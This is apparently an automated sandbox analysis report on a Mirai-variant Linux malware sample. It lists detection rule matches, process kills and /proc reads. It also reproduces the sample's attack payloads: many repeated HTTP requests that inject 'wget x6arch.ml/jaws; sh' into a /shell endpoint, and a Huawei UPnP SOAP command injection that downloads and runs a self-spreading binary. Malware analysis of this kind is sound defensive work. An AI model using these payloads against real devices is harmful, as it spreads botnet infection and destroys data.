        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive

        System Summary

        barindex
        Source: 1XUdzc3d3i, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
        Source: 1XUdzc3d3i, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
        Source: 5228.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
        Source: 5228.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
        Source: 5221.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
        Source: 5221.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2018, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2077, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2078, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2079, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2080, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2083, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2084, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2156, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5239, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5240, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5241, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5244, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5245, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5246, result: successful
        Source: 1XUdzc3d3i, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: 1XUdzc3d3i, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
        Source: 1XUdzc3d3i, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
        Source: 5228.1.00000000594e0e6b.000000004a73cece.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: 5221.1.00000000594e0e6b.000000004a73cece.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: 5221.1.00000000ca7ae29e.00000000594e0e6b.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: 5228.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: 5228.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
        Source: 5228.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
        Source: 5228.1.00000000ca7ae29e.00000000594e0e6b.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: 5221.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: 5221.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
        Source: 5221.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
        Source: Process Memory Space: 1XUdzc3d3i PID: 5221, type: MEMORYSTRMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: Process Memory Space: 1XUdzc3d3i PID: 5228, type: MEMORYSTRMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2018, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2077, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2078, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2079, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2080, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2083, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2084, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 2156, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5239, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5240, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5241, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5244, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5245, result: successful
        Source: /tmp/1XUdzc3d3i (PID: 5237)SIGKILL sent: pid: 5246, result: successful
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: classification engineClassification label: mal100.spre.troj.lin@0/0@1942/0
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1582/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2033/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2275/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/3088/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1612/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1579/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1699/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1335/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1698/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/2028/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1334/cmdline
        Source: /tmp/1XUdzc3d3i (PID: 5237)File opened: /proc/1576/cmdline
